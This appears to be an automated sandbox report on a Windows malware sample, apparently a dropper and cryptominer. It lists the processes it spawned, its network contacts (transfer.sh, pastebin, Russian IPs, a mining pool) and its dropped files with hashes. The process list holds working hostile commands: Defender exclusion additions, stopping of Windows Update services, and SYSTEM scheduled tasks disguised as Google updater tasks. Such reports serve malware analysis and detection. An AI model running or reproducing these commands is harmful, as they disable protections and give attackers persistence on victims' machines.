"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=63516 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1892 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2144 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2980 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3156 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3276 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3448 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x398

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3168 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 280

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#xjuusllbjmyevclq#> powershell <#xjuusllbjmyevclq#> -Verb <#xjuusllbjmyevclq#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 10:13 /f /tn InternetExplorerTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 10:13 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 21.170.83.51.in-addr.arpa udp
US 8.8.8.8:53 4.5.4.6.5.6.4.7.3.6.5.6.0.0.0.0.f.f.f.f.9.b.b.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.150:443 i.ytimg.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 150.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 98.39.251.142.in-addr.arpa udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
NL 142.251.36.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 2.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
NL 142.250.179.150:443 i.ytimg.com udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
NL 142.251.39.106:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
NL 142.251.36.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 106.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 71.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 185.159.129.168:80 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
N/A 127.0.0.1:63516 tcp
N/A 127.0.0.1:63516 tcp
N/A 127.0.0.1:63516 tcp
N/A 127.0.0.1:63516 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:80 pastebin.com tcp
US 104.20.67.143:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

memory/3812-118-0x0000000001A40000-0x0000000001A69000-memory.dmp

memory/3812-119-0x0000000001A70000-0x0000000001AAF000-memory.dmp

memory/3812-120-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/3812-122-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-121-0x0000000003950000-0x0000000003988000-memory.dmp

memory/3812-123-0x00000000737E0000-0x0000000073ECE000-memory.dmp

memory/3812-125-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-124-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-126-0x0000000005F00000-0x00000000063FE000-memory.dmp

memory/3812-127-0x0000000003910000-0x0000000003944000-memory.dmp

memory/3812-128-0x00000000037A0000-0x00000000037A6000-memory.dmp

memory/3812-129-0x00000000065B0000-0x0000000006BB6000-memory.dmp

memory/3812-130-0x0000000006BC0000-0x0000000006CCA000-memory.dmp

memory/3812-132-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-131-0x0000000006CD0000-0x0000000006CE2000-memory.dmp

memory/3812-133-0x0000000006CF0000-0x0000000006D2E000-memory.dmp

memory/3812-134-0x0000000006D90000-0x0000000006DDB000-memory.dmp

memory/3812-135-0x0000000001A40000-0x0000000001A69000-memory.dmp

memory/3812-136-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/3812-137-0x0000000001A70000-0x0000000001AAF000-memory.dmp

memory/3812-138-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-139-0x00000000737E0000-0x0000000073ECE000-memory.dmp

memory/3812-140-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-141-0x0000000006ED0000-0x0000000006F46000-memory.dmp

memory/3812-142-0x0000000006F50000-0x0000000006FE2000-memory.dmp

memory/3812-143-0x0000000006FF0000-0x0000000007056000-memory.dmp

memory/3812-144-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-145-0x0000000007950000-0x0000000007B12000-memory.dmp

memory/3812-146-0x0000000007B20000-0x000000000804C000-memory.dmp

memory/3812-147-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-148-0x00000000093E0000-0x0000000009430000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/4940-160-0x0000000000960000-0x0000000000BEB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/4564-165-0x0000000000D50000-0x0000000001384000-memory.dmp

memory/4564-170-0x0000000000D50000-0x0000000001384000-memory.dmp

memory/4564-174-0x00000000032D0000-0x0000000003340000-memory.dmp

memory/4564-168-0x0000000077754000-0x0000000077755000-memory.dmp

memory/3812-171-0x0000000000400000-0x00000000018D1000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/4564-178-0x00000000036B0000-0x000000000371C000-memory.dmp

memory/4564-177-0x00000000737E0000-0x0000000073ECE000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/4564-180-0x0000000005CC0000-0x0000000005CE2000-memory.dmp

memory/4564-179-0x0000000005BC0000-0x0000000005C72000-memory.dmp

memory/3812-182-0x00000000737E0000-0x0000000073ECE000-memory.dmp

memory/4564-183-0x0000000005CF0000-0x0000000006040000-memory.dmp

memory/700-184-0x00007FF73B430000-0x00007FF73C695000-memory.dmp

memory/4564-185-0x00000000013E0000-0x00000000013F0000-memory.dmp

memory/700-181-0x00007FF73B430000-0x00007FF73C695000-memory.dmp

memory/4564-186-0x00000000013E0000-0x00000000013F0000-memory.dmp

memory/700-212-0x00007FF9942E0000-0x00007FF9944BB000-memory.dmp

memory/4564-187-0x00000000013E0000-0x00000000013F0000-memory.dmp

memory/700-220-0x00007FF73B430000-0x00007FF73C695000-memory.dmp

memory/700-221-0x00007FF73B430000-0x00007FF73C695000-memory.dmp

memory/700-222-0x00007FF73B430000-0x00007FF73C695000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/700-223-0x00007FF73B430000-0x00007FF73C695000-memory.dmp

memory/700-227-0x00007FF73B430000-0x00007FF73C695000-memory.dmp

memory/4564-228-0x0000000000D50000-0x0000000001384000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Local State

MD5 4375797eb31506df711bcd7b54b214d5
SHA1 0c498f0d1baae3f235ca2442b974bbb2697cfeb1
SHA256 4bc048993548482e9fcc9a56b8bba96cf6627ffe232a77a5fbe60e85d816f015
SHA512 3db2c13546ac11419c4adbc289e40f94006670094e7d0f8bf0e430993b684512281e9623e2125e38ea83ae3b65fb8d591f59a1750baaeffc5eb9a67881b6e13e

memory/700-230-0x00007FF73B430000-0x00007FF73C695000-memory.dmp

\??\pipe\crashpad_4580_OTUNMIZPRATJPDZD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4940-233-0x0000000000960000-0x0000000000BEB000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Local Storage\leveldb\LOG.old

MD5 349e23caf549789db0403e7bbfdeae6e
SHA1 1a0b8a7fec41ff805af769a8dbd6b3c308fcd03a
SHA256 14afc4cf02aa76280b4aab23145c9ae28577ead712e3304ae2c83b792462ebcc
SHA512 7a2af6b8aa7f81a8be631ac11b7b2a7a1d86acadf490c0e3e875e8e541e8efc46b04828e01f527935d0ddb31b091dd036567d054e030cd68c7cb462279cbca8f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/4564-255-0x0000000003350000-0x0000000003392000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Local Storage\leveldb\LOG

MD5 20bbde602791ffdc6ed767ec780b899d
SHA1 f3965f85cca61ba041dfff8377cfc502ed5d883d
SHA256 c7a99075f168ff23ae2fe49f160d19a4a259265fba451cd9cd363ed6945bccd4
SHA512 44d8e84033eee232e7656b849469e3125be425a6590f102dbcd190feaf28cd3ec4be9fe4b9823e20e70f4dba8d3b007355ac8ca2431acb53b4ce08537679228a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\DawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

memory/3688-289-0x00007FF977150000-0x00007FF977B3C000-memory.dmp

memory/3688-290-0x0000021FD2860000-0x0000021FD2870000-memory.dmp

memory/4564-291-0x00000000737E0000-0x0000000073ECE000-memory.dmp

memory/700-292-0x00007FF73B430000-0x00007FF73C695000-memory.dmp

memory/3688-294-0x0000021FD2860000-0x0000021FD2870000-memory.dmp

memory/3688-295-0x0000021FD27A0000-0x0000021FD27C2000-memory.dmp

memory/3688-298-0x0000021FD2A70000-0x0000021FD2AE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_smy4mtlv.5c4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4564-316-0x00000000013E0000-0x00000000013F0000-memory.dmp

memory/4564-319-0x00000000013E0000-0x00000000013F0000-memory.dmp

memory/4564-317-0x00000000013E0000-0x00000000013F0000-memory.dmp